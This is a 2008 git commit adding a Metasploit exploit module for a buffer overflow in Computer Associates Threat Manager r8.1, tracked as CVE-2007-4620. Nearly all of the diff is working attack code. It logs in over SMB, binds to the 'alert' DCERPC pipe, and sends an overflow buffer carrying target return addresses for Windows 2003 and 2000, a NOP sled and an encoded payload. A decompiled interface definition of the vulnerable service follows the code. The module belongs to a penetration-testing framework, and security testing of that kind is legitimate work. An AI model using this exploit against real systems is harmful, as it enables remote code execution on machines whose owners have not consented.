added exploit module etrust_itm_alert.rb

git-svn-id: file:///home/svn/framework3/trunk@5472 4d416f70-5f16-0410-b530-b9f4589650da
2008-04-12 02:26:41 +00:00 · 2008-04-12 02:26:41 +00:00 · c1555ac449
parent 4b51c4d616
commit c1555ac449
1 changed files with 132 additions and 0 deletions
--- a/modules/exploits/windows/brightstor/etrust_itm_alert.rb
+++ b/modules/exploits/windows/brightstor/etrust_itm_alert.rb
@ -0,0 +1,132 @@
+##
+# $Id: etrust_itm_alert.rb
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Brightstor::Etrust_ITM_Alert < Msf::Exploit::Remote
+
+	include Exploit::Remote::DCERPC
+	include Exploit::Remote::SMB
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Computer Associates Alert Notification Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1
+				By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
+				In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					[ 'CVE', '2007-4620' ],
+					[ 'BID', '28605' ],
+				],
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 550,
+					'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
+					'StackAdjustment' => -3500,
+					'PrepenEncoder' => "\x81\xc4\x54\xf2\xff\xff",
+				},
+			'Platform' => 'win',
+			'Targets'  =>
+					[
+						[ 'Windows 2003 SP0 English',	{ 'Ret' => 0x77e03efb } ],
+						[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c30d043 } ], 
+					],
+			'DisclosureDate' => 'Apr 4 2008',
+			'DefaultTarget' => 0))
+			
+			register_options(
+			[
+				OptString.new('SMBPIPE', [ true,  "The pipe name to use (alert)", 'alert']),
+			], self.class)
+
+	end
+
+	def exploit
+		connect()
+		smb_login()
+		
+		handle = dcerpc_handle('3d742890-397c-11cf-9bf1-00805f88cb72', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])	
+		print_status("Binding to #{handle} ...")
+
+		dcerpc_bind(handle)
+		print_status("Bound to #{handle} ...")
+		
+		filler = rand_text_english(979) + [target.ret].pack('V') + make_nops(12) + payload.encoded
+ 
+		sploit =  NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.string(filler + "\x00") 
+		sploit << NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.long(0) 
+
+		print_status("Trying target #{target.name}...")
+         
+			begin
+				dcerpc_call(0x00, sploit)
+				rescue Rex::Proto::DCERPC::Exceptions::NoResponse
+			end
+		
+		handler
+		disconnect
+	end
+
+end
+end
+=begin
+/*
+ * IDL code generated by mIDA v1.0.8
+ * Copyright (C) 2006, Tenable Network Security
+ * http://cgi.tenablesecurity.com/tenable/mida.php
+ * 
+ * 
+ * Decompilation information:
+ * RPC stub type: inline
+ */
+
+[
+ uuid(3d742890-397c-11cf-9bf1-00805f88cb72),
+ version(1.0)
+]
+
+interface mIDA_interface
+{
+
+typedef struct struct_1 {
+ long elem_1;
+ [size_is(10000), length_is(elem_1)] struct struct_2 * elem_2;
+} struct_1 ;
+
+typedef struct struct_2 {
+ char elem_1[52];
+} struct_2 ;
+
+
+/* opcode: 0x00, address: 0x00401000 */
+
+long   sub_401000 (
+ [in][ref][string] char * arg_1,
+ [out][ref] struct struct_1 * arg_2,
+ [in][ref][string] char * arg_3
+);
+
+}
+=end